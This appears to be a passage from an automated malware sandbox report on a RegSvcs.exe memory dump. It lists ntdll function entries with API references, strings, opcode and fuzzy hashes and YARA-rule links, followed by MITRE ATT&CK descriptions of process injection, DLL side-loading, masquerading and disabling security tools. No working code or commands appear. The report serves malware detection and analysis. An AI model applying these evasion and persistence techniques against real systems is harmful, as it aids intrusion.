API ID: DebugPrintTimes
String ID: 0Ivw$0Ivw$0Ivw$X
API String ID: 3446177414-3775388739
Opcode ID: 58432ae8e399292da5243744d365342a8cf444939e80b80ff764f667734c567a
Instruction ID: 33b3efc228b2ac38386493a28312cacedfb9aaf3ff88c8cd004e47d5aa4603a6
Opcode Fuzzy Hash: 58432ae8e399292da5243744d365342a8cf444939e80b80ff764f667734c567a
Instruction Fuzzy Hash: 9831B431D0420AEBCF26EF58E844B8DBBB5ABC5758F018059FD056A251E7B0CA90CF45

Function 0116DB00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 133timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 011AF611

Strings

, passed to %s, xrefs: 011AF662
RtlUnlockHeap, xrefs: 011AF65D
Invalid heap signature for heap at %p, xrefs: 011AF653

Memory Dump Source

Source File: 00000011.00000002.1758810218.0000000001136000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Associated: 00000011.00000002.1758810218.0000000001110000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001117000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001190000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001196000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.00000000011D2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001233000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001239000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1110000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID: , passed to %s$Invalid heap signature for heap at %p$RtlUnlockHeap
API String ID: 3446177414-56086060
Opcode ID: 0811baf472a3f239f348f5f2376c7d2d2b47689e857b38d9abce27601404059a
Instruction ID: f2dcf5f8d531f4c4690b6e19abe14735880e680b2e8ee363ec2161f661a82657
Opcode Fuzzy Hash: 0811baf472a3f239f348f5f2376c7d2d2b47689e857b38d9abce27601404059a
Instruction Fuzzy Hash: 10418771700742DFDB2EDF68C489BAEBBB8EF42324F058069E54687395CB75A881C791

Function 011C4755 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 011C4809

Strings

LdrpCheckRedirection, xrefs: 011C488F
minkernel\ntdll\ldrredirect.c, xrefs: 011C4899
Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 011C4888

Memory Dump Source

Source File: 00000011.00000002.1758810218.0000000001196000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Associated: 00000011.00000002.1758810218.0000000001110000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001117000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001136000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001190000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.00000000011D2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001233000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001239000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1110000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 3446177414-3154609507
Opcode ID: a503f4feeda4f663a59543d00111d4efe1a94e14d81e111d57516d5d3b805de1
Instruction ID: a7e9643994b699b211b00d367b4f4a4e838b3e0acebd5f5047f3816bccf18cd0
Opcode Fuzzy Hash: a503f4feeda4f663a59543d00111d4efe1a94e14d81e111d57516d5d3b805de1
Instruction Fuzzy Hash: 5C41D432A187519FCB29CF9CD860A27BBE4EF69E50B06056DED88D7B55D730D800CB92

Function 0116DBA0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 84timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 011AF757

Strings

, passed to %s, xrefs: 011AF7A8
Invalid heap signature for heap at %p, xrefs: 011AF799
RtlLockHeap, xrefs: 011AF7A3

Memory Dump Source

Source File: 00000011.00000002.1758810218.0000000001136000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Associated: 00000011.00000002.1758810218.0000000001110000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001117000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001190000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001196000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.00000000011D2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001233000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001239000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1110000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID: , passed to %s$Invalid heap signature for heap at %p$RtlLockHeap
API String ID: 3446177414-3526935505
Opcode ID: 96198f3bebbbbcfdae9162ef85578aae5150f0b372a49c0f8081f7de2738a40c
Instruction ID: f6ff391371705a97b4920fa316343cb4b90d96d4ffb93335d269431cf7502216
Opcode Fuzzy Hash: 96198f3bebbbbcfdae9162ef85578aae5150f0b372a49c0f8081f7de2738a40c
Instruction Fuzzy Hash: 8C318B35204B85DFDB2FDB6CD409B69BFE8EF02B14F054058E4428779AD7B5A881C752

Function 0113C070 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 0113C0B4
RtlDebugPrintTimes.NTDLL ref: 0119D623
RtlDebugPrintTimes.NTDLL ref: 0119D651

Strings

$, xrefs: 0113C07C

Memory Dump Source

Source File: 00000011.00000002.1758810218.0000000001136000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Associated: 00000011.00000002.1758810218.0000000001110000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001117000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001190000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001196000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.00000000011D2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001233000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001239000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1110000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $
API String ID: 3446177414-3993045852
Opcode ID: 59d6372379f3acbdffb38998c9b7646b2ee7e9fe7705424b6884a9ae94dab179
Instruction ID: 71d4ccdf9d06436f017e9383ba253effd12fb89689041ee41f5bab9ea6759cf6
Opcode Fuzzy Hash: 59d6372379f3acbdffb38998c9b7646b2ee7e9fe7705424b6884a9ae94dab179
Instruction Fuzzy Hash: 88112D32A04218EFCF19AFA4F848A9D7B72FF85764F108519F9266B2D0CB715A40CF80

Function 0116EF28 Relevance: 6.3, APIs: 4, Instructions: 347COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.1758810218.0000000001136000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Associated: 00000011.00000002.1758810218.0000000001110000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001117000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001190000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001196000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.00000000011D2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001233000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001239000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1110000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d577f9f5bbc3ca2d61b3364d2258a032be2b86bf200f7adac2a3c69bfbd8e289
Instruction ID: 49a45a68bcfd426636337b382a52cebb09a7f31c20a349fbc969adb5255cdf83
Opcode Fuzzy Hash: d577f9f5bbc3ca2d61b3364d2258a032be2b86bf200f7adac2a3c69bfbd8e289
Instruction Fuzzy Hash: 81E13475D00209DFCF29CFA9D990AADBBF9FF48304F20452AE956A7221D771A852CF11

Function 011BEF50 Relevance: 6.2, APIs: 4, Instructions: 187timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 011BEFE1
RtlDebugPrintTimes.NTDLL ref: 011BF009
RtlDebugPrintTimes.NTDLL ref: 011BF0AC
RtlDebugPrintTimes.NTDLL ref: 011BF160

Memory Dump Source

Source File: 00000011.00000002.1758810218.0000000001196000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Associated: 00000011.00000002.1758810218.0000000001110000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001117000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001136000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001190000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.00000000011D2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001233000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001239000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1110000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: b930b3675b58525b16074e9bb035d7f5f4c05c76671e0134f7941e9d1ebfad34
Instruction ID: 84ba1568198025dfbbd57d2ac2393beb0ad4e840aee9be1d77edae587cdf2622
Opcode Fuzzy Hash: b930b3675b58525b16074e9bb035d7f5f4c05c76671e0134f7941e9d1ebfad34
Instruction Fuzzy Hash: C1714771E0021AAFDF09CFA8C984ADDBBB5BF49314F14802AEA05FB254D774A906CF54

Function 011BF1D6 Relevance: 6.2, APIs: 4, Instructions: 150timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 011BF26D
RtlDebugPrintTimes.NTDLL ref: 011BF292
RtlDebugPrintTimes.NTDLL ref: 011BF324
RtlDebugPrintTimes.NTDLL ref: 011BF378

Memory Dump Source

Source File: 00000011.00000002.1758810218.0000000001196000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Associated: 00000011.00000002.1758810218.0000000001110000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001117000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001136000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001190000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.00000000011D2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001233000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001239000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1110000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: b1c1143d62effe0fbbaa596f70f1ccc06981fc44e96c31ccca3c2f63071cfd4c
Instruction ID: d119e26bd36cd30cab8d0f2916d025078e2de86d966e5f96279c537d4ddec12f
Opcode Fuzzy Hash: b1c1143d62effe0fbbaa596f70f1ccc06981fc44e96c31ccca3c2f63071cfd4c
Instruction Fuzzy Hash: 92514576E0521AEFDF08CF98D888ADCBBB1BF48314F14802AE905B7250D7749942CF54

Function 01177B2F Relevance: 6.1, APIs: 4, Instructions: 81timethreadCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 01177B52
BaseThreadInitThunk.KERNEL32 ref: 01177B5C
RtlDebugPrintTimes.NTDLL ref: 011B49ED
RtlDebugPrintTimes.NTDLL ref: 011B4A70

Memory Dump Source

Source File: 00000011.00000002.1758810218.0000000001136000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Associated: 00000011.00000002.1758810218.0000000001110000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001117000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001190000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001196000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.00000000011D2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001233000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001239000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1110000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes$BaseInitThreadThunk
String ID:
API String ID: 4281723722-0
Opcode ID: 2272a22d8479a09c0395e8a986cca7fbb6ecf17cf53b65587f57369de8f41d73
Instruction ID: c95aded831def864adc1123883d7fe5dd1e477d81c578850f13566641e70f467
Opcode Fuzzy Hash: 2272a22d8479a09c0395e8a986cca7fbb6ecf17cf53b65587f57369de8f41d73
Instruction Fuzzy Hash: 43310575E00219EFCF29DFA8E888AADBBF1FB49724F10812AE512B7294D7755900CF54

Function 011459C0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON

Download Yara Rule

Strings

@, xrefs: 011A0AA7

Memory Dump Source

Source File: 00000011.00000002.1758810218.0000000001136000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Associated: 00000011.00000002.1758810218.0000000001110000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001117000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001190000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001196000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.00000000011D2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001233000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001239000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1110000_RegSvcs.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 2f2e1fe783827a9c66314534d8cae9ee5975c6e8998c47d6465a843bb586218f
Instruction ID: eb38286273faa53b45d277bfe8a5b84bac3b5c6513661b30e58bc104c9f556e8
Opcode Fuzzy Hash: 2f2e1fe783827a9c66314534d8cae9ee5975c6e8998c47d6465a843bb586218f
Instruction Fuzzy Hash: 81327970D0026ADFDB69DF68C884BEDBBB5BF09708F0081E9D549A7241D7749A84CF91

Function 01187D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 01187E8B

Strings

+, xrefs: 01187DE8
-, xrefs: 01187DDD

Memory Dump Source

Source File: 00000011.00000002.1758810218.0000000001136000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Associated: 00000011.00000002.1758810218.0000000001110000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001117000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001190000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001196000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.00000000011D2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001233000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001239000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1110000_RegSvcs.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: d84d73e5c23e50fb3757e9c39722a22be4762bc4311d32b0c95698253cae6a4f
Instruction ID: 3ed77d1a1ce381180f291ae0c832fcef4bcb33fd3867a52c4e20fe6b6ce0aa6d
Opcode Fuzzy Hash: d84d73e5c23e50fb3757e9c39722a22be4762bc4311d32b0c95698253cae6a4f
Instruction Fuzzy Hash: 42919471E002169AEB2CEF6DC8816BEBBA5AF44720F64C51AE965E72C0D73099418F52

Function 0115D02D Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 0115D3A4

Strings

l, xrefs: 0115D46B
Bl, xrefs: 0115D48C

Memory Dump Source

Source File: 00000011.00000002.1758810218.0000000001136000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Associated: 00000011.00000002.1758810218.0000000001110000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001117000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001190000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001196000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.00000000011D2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001233000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001239000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1110000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Bl$l
API String ID: 3446177414-208461968
Opcode ID: a502c3e414e5d022dc92eadf72e36723c4728d5a3e64f9fcd0c9ac1c8de3797b
Instruction ID: 2efe56c586ed9438ea518c1ac390f1f77aa66c736f3d7ce5494fda193a946dc6
Opcode Fuzzy Hash: a502c3e414e5d022dc92eadf72e36723c4728d5a3e64f9fcd0c9ac1c8de3797b
Instruction Fuzzy Hash: 54A1E771A00329CBEFB9DB98D884BADBBB5BB44304F0540E9DD1967641CB74AE84CF51

Function 01185DA4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 01185E34

Strings

pow, xrefs: 01185E0C, 01185E29

Memory Dump Source

Source File: 00000011.00000002.1758810218.0000000001136000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Associated: 00000011.00000002.1758810218.0000000001110000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001117000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001190000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001196000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.00000000011D2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001233000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001239000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1110000_RegSvcs.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 71dca94e891258e79c414a2ccd91d9793f7b6ed9f3265be4d9237d995a4d647e
Instruction ID: efe823cad5b40da114bcf509d681ef618ddb638eafb62a057f512214868eaa05
Opcode Fuzzy Hash: 71dca94e891258e79c414a2ccd91d9793f7b6ed9f3265be4d9237d995a4d647e
Instruction Fuzzy Hash: C4518C7190C20696D7AEB61CD90537EBFE6EB40740F10C958E4E58A2D9EB3484D58F4F

Function 01174C59 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON

Download Yara Rule

Strings

0, xrefs: 01174CC3
Flst, xrefs: 01174C96

Memory Dump Source

Source File: 00000011.00000002.1758810218.0000000001136000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Associated: 00000011.00000002.1758810218.0000000001110000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001117000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001190000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001196000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.00000000011D2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001233000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001239000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1110000_RegSvcs.jbxd

Similarity

API ID:
String ID: 0$Flst
API String ID: 0-758220159
Opcode ID: 1efc9403a7d018d0689cfbf936ccfc657f6cc2115542015f4aee1afac05506f0
Instruction ID: b967849ee74171fb82eaf2c0ac6ec89a0882dd952b386950f5167261a7dc95ef
Opcode Fuzzy Hash: 1efc9403a7d018d0689cfbf936ccfc657f6cc2115542015f4aee1afac05506f0
Instruction Fuzzy Hash: 19519BB1E00218CFDF2ACF99D4846ADFBF4FF54758F25802AD0999B651EB709985CB80

Function 011BFD82 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 011BFE73
RtlDebugPrintTimes.NTDLL ref: 011BFE95

Strings

$, xrefs: 011BFE3D

Memory Dump Source

Source File: 00000011.00000002.1758810218.0000000001196000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Associated: 00000011.00000002.1758810218.0000000001110000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001117000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001136000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001190000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.00000000011D2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001233000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001239000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1110000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $
API String ID: 3446177414-3993045852
Opcode ID: d080a817f98a9a5343235c850efd6399678a6c1174f680aba7dbf580d6a66a7f
Instruction ID: a1453afe3648e0c36eb3e002e89dc4cb86e038c9705c7cec249ac90253ecd842
Opcode Fuzzy Hash: d080a817f98a9a5343235c850efd6399678a6c1174f680aba7dbf580d6a66a7f
Instruction Fuzzy Hash: 7041AB75A0021AAFDF29DF99D884AEEBBB5FF48B04F150119ED00A7341C7719E52CBA0

Function 0113DF81 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 0113E040

Strings

0, xrefs: 0113E020
0, xrefs: 0113E00B

Memory Dump Source

Source File: 00000011.00000002.1758810218.0000000001136000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true

Associated: 00000011.00000002.1758810218.0000000001110000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001117000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001190000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001196000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.00000000011D2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001233000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.1758810218.0000000001239000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1110000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID: 0$0
API String ID: 3446177414-203156872
Opcode ID: 57910884cc8f3f542d401e2c42643943943121a3a75c810dd7a245f8ff7e16ec
Instruction ID: 794107cc0ab19c90f139af2f7d706166b6e67cdbcc631509b5cf7f906cd1603c
Opcode Fuzzy Hash: 57910884cc8f3f542d401e2c42643943943121a3a75c810dd7a245f8ff7e16ec
Instruction Fuzzy Hash: B8417CB16087069FC714CF68D484A56BBE8BB88718F04492EF988DB341D771EA06CF96

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

